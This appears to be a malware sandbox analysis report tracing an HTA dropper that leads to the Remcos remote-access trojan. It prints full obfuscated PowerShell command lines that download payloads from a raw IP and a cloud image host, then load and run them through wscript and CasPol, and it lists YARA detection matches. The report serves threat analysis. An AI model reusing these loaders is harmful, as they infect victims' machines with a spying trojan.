                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prasonJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_004158B9
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E176388_2_02E17638
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E1B8708_2_02E1B870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041D07112_2_0041D071
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004520D212_2_004520D2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043D09812_2_0043D098
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043715012_2_00437150
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004361AA12_2_004361AA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0042625412_2_00426254
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043137712_2_00431377
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041E5DF12_2_0041E5DF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044C73912_2_0044C739
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004267CB12_2_004267CB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043C9DD12_2_0043C9DD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00432A4912_2_00432A49
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043CC0C12_2_0043CC0C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434D2212_2_00434D22
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00426E7312_2_00426E73
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00440E2012_2_00440E20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043CE3B12_2_0043CE3B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00412F4512_2_00412F45
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00452F0012_2_00452F00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00426FAD12_2_00426FAD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401F66 appears 50 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004020E7 appears 41 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004338A5 appears 41 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00433FB0 appears 55 times
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2059
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2026
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2059Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2026Jump to behavior
                      Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: CasPol.exe PID: 1776, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@18/16@5/4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00416AB7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040E219
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041A63F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BC4
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\seewhatiamdoingforyouwithgreatnessthingsgivenmeback[1].tiffJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-H22KKM
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1364:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:948:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2edxtcbw.wk3.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS"
                      Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaVirustotal: Detection: 27%
                      Source: seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaReversingLabs: Detection: 13%
                      Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAg